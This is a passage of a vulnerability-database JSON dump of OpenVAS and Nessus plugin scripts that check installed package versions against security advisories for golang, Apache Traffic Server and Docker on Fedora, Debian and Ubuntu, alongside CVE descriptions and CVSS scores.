value:\"2019-416d20f960\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q5MD2F7ATWSTB45ZJIPJHBAAHVRGRAKG\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'golang'\n package(s) announced via the FEDORA-2019-416d20f960 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Go Programming Language.\");\n\n script_tag(name:\"affected\", value:\"'golang' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"golang\", rpm:\"golang~1.12.10~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-10-30T10:20:45", "description": "Apache Traffic Server is prone to multiple denial of service vulnerabilities\n in the HTTP/2 implementation.", "cvss3": {}, "published": "2019-10-28T00:00:00", "type": "openvas", "title": "Apache Traffic Server (ATS) Multiple HTTP/2 DoS vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-9515", "CVE-2019-9512", "CVE-2019-10079", "CVE-2019-9514"], "modified": "2019-10-28T00:00:00", "id": "OPENVAS:1361412562310143069", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143069", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:traffic_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143069\");\n script_version(\"2019-10-28T05:15:58+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-28 05:15:58 +0000 (Mon, 28 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-28 05:08:21 +0000 (Mon, 28 Oct 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-9515\", \"CVE-2019-10079\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Traffic Server (ATS) Multiple HTTP/2 DoS vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_apache_traffic_detect.nasl\");\n script_mandatory_keys(\"apache_trafficserver/installed\");\n\n script_tag(name:\"summary\", value:\"Apache Traffic Server is prone to multiple denial of service vulnerabilities\n in the HTTP/2 implementation.\");\n\n script_tag(name:\"insight\", value:\"Apache Traffic Server is prone to multiple denial of service vulnerabilities:\n\n - Ping Flood (CVE-2019-9512)\n\n - Reset Flood (CVE-2019-9514)\n\n - Settings Flood (CVE-2019-9515)\n\n - Malformed SETTINGS frames (CVE-2019-10079)\");\n\n script_tag(name:\"affected\", value:\"Apache Traffic Server versions 6.0.0 - 6.2.3, 7.0.0 - 7.1.6 and 8.0.0 - 8.0.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.1.7, 8.0.4 or later.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://lists.apache.org/thread.html/bde52309316ae798186d783a5e29f4ad1527f61c9219a289d0eee0a7@%3Cdev.trafficserver.apache.org%3E\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"6.0.0\", test_version2: \"6.2.3\") ||\n version_in_range(version: version, test_version: \"7.0.0\", test_version2: \"7.1.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.1.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0.0\", test_version2: \"8.0.3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.0.4\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-09-12T16:55:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4520-1 (trafficserver - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-9515", "CVE-2019-9512", "CVE-2019-9518", "CVE-2019-9514"], "modified": "2019-09-11T00:00:00", "id": "OPENVAS:1361412562310704520", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704520", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704520\");\n script_version(\"2019-09-11T02:00:16+0000\");\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-9515\", \"CVE-2019-9518\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-11 02:00:16 +0000 (Wed, 11 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-11 02:00:16 +0000 (Wed, 11 Sep 2019)\");\n script_name(\"Debian Security Advisory DSA 4520-1 (trafficserver - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4520.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4520-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'trafficserver'\n package(s) announced via the DSA-4520-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in the HTTP/2 code of Apache\nTraffic Server, a reverse and forward proxy server, which could result\nin denial of service.\n\nThe fixes are too intrusive to backport to the version in the oldstable\ndistribution (stretch). An upgrade to Debian stable (buster) is\nrecommended instead.\");\n\n script_tag(name:\"affected\", value:\"'trafficserver' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), these problems have been fixed in\nversion 8.0.2+ds-1+deb10u1.\n\nWe recommend that you upgrade your trafficserver packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"trafficserver\", ver:\"8.0.2+ds-1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"trafficserver-dev\", ver:\"8.0.2+ds-1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"trafficserver-experimental-plugins\", ver:\"8.0.2+ds-1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2023-02-11T15:14:38", "description": "Aleksa Sarai discovered that Docker was vulnerable to a directory traversal attack. An attacker could use this vulnerability to read and write arbitrary files on the host filesystem as root.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-07-09T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 18.10 / 19.04 : Docker vulnerabilities (USN-4048-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15664", "CVE-2019-5736"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:docker.io", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:19.04"], "id": "UBUNTU_USN-4048-1.NASL", "href": "https://www.tenable.com/plugins/nessus/126564", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4048-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126564);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2018-15664\", \"CVE-2019-5736\");\n script_xref(name:\"USN\", value:\"4048-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 18.10 / 19.04 : Docker vulnerabilities (USN-4048-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Aleksa Sarai discovered that Docker was vulnerable to a directory\ntraversal attack. An attacker could use this vulnerability to read and\nwrite arbitrary files on the host filesystem as root.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4048-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected docker.io package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Docker Container Escape Via runC Overwrite');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:docker.io\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:19.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2023 Canonical, Inc. / NASL script (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|18\\.10|19\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04 / 18.10 / 19.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"docker.io\", pkgver:\"18.09.7-0ubuntu1~16.04.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"docker.io\", pkgver:\"18.09.7-0ubuntu1~18.04.3\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"docker.io\", pkgver:\"18.09.7-0ubuntu1~18.10.3\")) flag++;\nif (ubuntu_check(osver:\"19.04\", pkgname:\"docker.io\", pkgver:\"18.09.7-0ubuntu1~19.04.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker.io\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:26:33", "description": "Three security vulnerabilities have been discovered in the Docker container runtime: Insecure loading of NSS libraries in 'docker cp'could result in execution of code with root privileges, sensitive data could be logged in debug mode and there was a command injection vulnerability in the 'docker build' command.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-10T00:00:00", "type": "nessus", "title": "Debian DSA-4521-1 : docker.io - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13139", "CVE-2019-13509", "CVE-2019-14271"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:docker.io", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4521.NASL", "href": "https://www.tenable.com/plugins/nessus/128622", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4521. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128622);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-13139\", \"CVE-2019-13509\", \"CVE-2019-14271\");\n script_xref(name:\"DSA\", value:\"4521\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0725\");\n\n script_name(english:\"Debian DSA-4521-1 : docker.io - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Three security vulnerabilities have been discovered in the Docker\ncontainer runtime: Insecure loading of NSS libraries in 'docker\ncp'could result in execution of code with root privileges, sensitive\ndata could be logged in debug mode and there was a command injection\nvulnerability in the 'docker build' command.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/docker.io\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/docker.io\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4521\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the docker.io packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 18.09.1+dfsg1-7.1+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:docker.io\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"docker-doc\", reference:\"18.09.1+dfsg1-7.1+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"docker.io\", reference:\"18.09.1+dfsg1-7.1+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"golang-docker-dev\", reference:\"18.09.1+dfsg1-7.1+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"golang-github-docker-docker-dev\", reference:\"18.09.1+dfsg1-7.1+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"vim-syntax-docker\", reference:\"18.09.1+dfsg1-7.1+deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-10T14:55:22", "description": "The http2 server support in this package was vulnerable to certain types of DOS attacks.\n\nCVE-2019-9512\n\nThis code was vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses.\nDepending on how efficiently this data is queued, this can consume excess CPU, memory, or both.\n\nCVE-2019-9514\n\nThis code was vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.\n\nFor Debian 9 stretch, these problems have been fixed in version 1:0.0+git20161013.8b4af36+dfsg-3+deb9u1.\n\nWe recommend that you upgrade your golang-golang-x-net-dev packages.\n\nFor the detailed security status of golang-golang-x-net-dev please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/golang-golang-x-net-dev\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "Debian DLA-2485-1 : golang-golang-x-net-dev security update (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:golang-go.net-dev", "p-cpe:/a:debian:debian_linux:golang-golang-x-net-dev", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2485.NASL", "href": "https://www.tenable.com/plugins/nessus/143594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2485-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143594);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Debian DLA-2485-1 : golang-golang-x-net-dev security update (Ping Flood) (Reset Flood)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The http2 server support in this package was vulnerable to certain\ntypes of DOS attacks.\n\nCVE-2019-9512\n\nThis code was vulnerable to ping floods, potentially leading to a\ndenial of service. The attacker sends continual pings to an HTTP/2\npeer, causing the peer to build an internal queue of responses.\nDepending on how efficiently this data is queued, this can consume\nexcess CPU, memory, or both.\n\nCVE-2019-9514\n\nThis code was vulnerable to a reset flood, potentially leading to a\ndenial of service. The attacker opens a number of streams and sends an\ninvalid request over each stream that should solicit a stream of\nRST_STREAM frames from the peer. Depending on how the peer queues the\nRST_STREAM frames, this can consume excess memory, CPU, or both.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:0.0+git20161013.8b4af36+dfsg-3+deb9u1.\n\nWe recommend that you upgrade your golang-golang-x-net-dev packages.\n\nFor the detailed security status of golang-golang-x-net-dev please\nrefer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/golang-golang-x-net-dev\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/12/msg00011.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/golang-golang-x-net-dev\"\n );\n # https://security-tracker.debian.org/tracker/source-package/golang-golang-x-net-dev\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c2f3b613\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:golang-go.net-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:golang-golang-x-net-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 